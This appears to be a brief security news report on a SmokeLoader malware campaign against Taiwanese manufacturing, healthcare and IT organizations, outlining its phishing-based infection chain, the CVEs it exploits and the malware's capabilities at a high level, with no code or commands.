A sophisticated malware campaign has emerged in Taiwan, specifically targeting organizations in manufacturing, healthcare, and IT industries. The attack utilizes SmokeLoader, a veteran malware strain first discovered in 2011, known for its advanced evasion capabilities and modular architecture.
Despite recent disruption efforts by Europol’s Operation “Endgame,” which eliminated 1,000 command-and-control domains and cleaned 50,000 infections, threat actors continue to deploy cracked versions of SmokeLoader found on underground forums.
The infection chain begins with phishing emails containing Excel attachments that exploit known vulnerabilities (CVE-2017-0199 and CVE-2017-11882). Once executed, the attack deploys Ande Loader, followed by SmokeLoader’s two-component system: a stager for decryption and injection, and a main module handling persistence and command-and-control communication.
SmokeLoader’s arsenal includes credential theft from various applications, DDoS attack capabilities, cryptocurrency mining, and expandable functionality through plugins. The malware’s sophisticated features include environment detection, fake traffic generation, and code obfuscation, making it particularly challenging to detect and analyze.
This resurgence demonstrates the persistent threat of well-established malware tools, even after significant law enforcement interventions.